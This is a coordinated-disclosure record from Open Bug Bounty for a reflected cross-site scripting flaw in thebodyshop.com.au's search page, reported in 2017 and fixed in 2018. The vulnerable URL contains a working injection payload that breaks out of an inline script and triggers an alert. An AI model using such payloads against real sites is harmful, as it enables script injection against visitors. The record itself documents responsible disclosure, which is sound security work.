thebodyshop.com.au XSS vulnerability

2017-12-20T05:48:00
ID OBB:455865
Type openbugbounty
Reporter jimcola99
Modified 2018-03-31T08:53:00

Description

Open Bug Bounty ID: OBB-455865

Description| Value
---|---
Affected Website:| thebodyshop.com.au
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.thebodyshop.com.au/search?q=aids');})();alert('openbugbounty');(function() {var w = window, d = document;var s = d.createElement('script');s.setAttribute('async', 'true');s.setAttribute('type', 'text/javascript');s.setAttribute('src', '//c1.rfihub.net/js/tc.min.js');var f = d.getElementsByTagName('script')[0];f.parentNode.insertBefore(s, f);if (typeof w['_rfi'] !== 'function') {w['_rfi']=function() {w['_rfi'].commands = w['_rfi'].commands || [];w['_rfi'].commands.push(arguments);};}_rfi('setArgs', 'ver', '9');_rfi('setArgs', 'rb', '28040');_rfi('setArgs', 'ca', '20749683');_rfi('setArgs', 't', 'srp');_rfi('setArgs', 'q', 'aid&submit;=
Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 20 December, 2017 05:48 GMT
Vulnerability Verified:| 20 December, 2017 05:50 GMT
Website Operator Notified:| 20 December, 2017 05:50 GMT
Vulnerability Published:| 20 December, 2017 05:50 GMT[without any technical details]
Vulnerability Fixed:| 31 March, 2018 08:53 GMT
Public Disclosure:| 31 March, 2018 08:53 GMT